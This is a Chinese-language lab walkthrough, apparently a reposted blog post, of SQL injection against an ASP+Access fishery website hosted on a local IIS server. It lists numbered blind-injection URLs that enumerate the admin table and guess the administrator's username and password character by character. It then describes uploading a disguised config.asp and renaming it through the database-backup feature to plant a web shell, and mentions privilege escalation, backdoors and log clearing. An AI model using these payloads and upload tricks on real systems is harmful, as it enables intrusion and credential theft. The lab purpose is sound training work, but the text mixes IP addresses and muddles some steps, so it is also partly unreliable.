潜江水产案例
(sql注入之asp+access)
实验目的通过注入漏洞上传config.asp
实验过程如下所示:
实验前提:在服务器上要搭建好IIS
开始实验
把已经编好的web通过共享的方式上传到服务器上,然后解压这个潜江水产的数据包
文件,然后把这个数据包导入到c:\inetpub\wwwroot下面,接着通过命令行inetmgr打开
搭建好的默认网站,然后在默认网站中的主目录下面指定潜江水产的路径,然后在配置中的设置中启用父路径,在指引中添加index.asp,然后在网络扩展中把asp给启动
网站服务器一切准备好后,在客户端来访问一下潜江水产的服务器
现在我们就要利用编程的简单的查询来推断网站是否存在注入漏洞
访问网站后,在地址栏输入:http:\192.168.2.4,然后在网页中找到一个武汉水产专家,
当出现地址为:http://192.168.2.4/shownews.asp?id=41时,这就是典型的注入漏洞
我们可以用下面可以到shownews.asp中查看一下看有没有“武汉水产专家”,发现找不到,说明这个新闻页面时保存在数据库里面的
现在我们到数据库中查询一下“select”
下面是搭建好潜江水产的web页面
http://192.168.2.4/shownews.asp?id=41查询正常
我们可以用三种方法来确定它存在注入漏洞
1.http://192.168.2.4/shownews.asp?id=41’查询不正常
2.http://192.168.2.4/shownews.asp? id=41 and 1=1查询正常
3.http://192.168.2.4/shownews.asp? id=41 and 1=2查询不正常
4.http://192.168.2.4/shownews.asp?id=41 and select username,password from user查询报错
5.http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(*) from admin)正常访问
6.http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(*) from admin1)不正常访问
7.http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(user) from admin)查询正常
8.http://192.168.2.4/shownews.asp?id=41 and 0<>(select count(password) from admin)
9.http://192.168.2.4/shownews.asp?id=41 and (select top 1 len (user)from admin)>0 正常
10.http://192.168.2.4/shownews.asp?id=41 and (select top 1 len (user)from admin)>1正常
11.http://192.168.2.4/shownews.asp?id=41 and (select top 1 len (user)from admin)>2 正常,知道出现报错就是那个数,这样一个一个的尝试,直到出现报错时为止。那么密码的长度就为那个报错的位数,接下来就是猜密码了
12.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(user,1,1))from admin)>0出现错误
13.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc( mid(username,1,1))from admin)>0正常
14.http://192.168.1.10/shownews.asp?id=41 and (select top 1 len(username)from admin )>1
15.http://192.168.1.10/shownews.asp?id=41 and (select top 1 len(username)from admin )>2 刚刚前面出现了问题,现在又要重新的再来猜一遍,直到猜出报错时为止,那么密码的长度就为出现报错的那个数
16.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(username,1,1))from admin)>0 现在来猜管理员的帐号
下面是用小葵来一步一步的破解密码的过程
17.http://192.168.2.4/shownews.asp?id=41 and (select top 1 len (password)from admin) >0 现在猜密码的长度
18.http://192.168.1.10/shownews.asp?id=41 and (select top 1 asc(mid(password,1,1))from admin)>0 现在就猜密码为多少
下面是用小葵来一步一步的破解密码
现在管理员的帐号已经查出来了,管理员的密码也猜出来了
接下来就要开始注入了
在潜江水产网的下面找到“网站管理”,然后输入管理员的帐号和密码就可以直接访问后台
然后找到新闻的编辑页面,在这里面找到插入图片,你就可以利用这个漏洞来上传图片,也就把config.asp这个文件传上去了,但是这里文件只有jpg,gpf,那么你就要
回到客户端,把config.asp的后缀名改为gpf或jpg内型的,
然后找到这个文件存放的地方,在客户端的地址栏中输入这个地址,发现不能够访问
然后在系统管理中找到上传文件,然后找到数据库备份,然后把文件备份一下,并找到备份的路径
然后把图片的路径保存在当前的数据库下,然后把保存的数据库的名称的后缀名更改一下,
然后复制这个地址,然后在地址栏中输入这个confi.asp文件的路径
在这里需要把里面的内容填写一下,然后再上传,然后找到上传后的路径地址
下面就可以一步一步的通过config.asp来上传文件,然后提权,然后远程登录,然后做后门,然后清除日志等一系列的操作,在这里我就不演示了
总结:仅供学习参考,资料来源于2013.5.8日学习整理,请勿做违法犯禁事情,违者自咎,我只是提供一个学习平台,仅供学习参考,希望大家把这个拿来作为公司的安全防护做漏洞测试,请勿用来作侵害他人财产或者经济损失及个人隐私安全泄露的事情,违者当事人自负,注意,此仅仅是供学习参考借鉴使用,请勿做违法事情
原文地址:http://blog.51cto.com/vbers/2119655
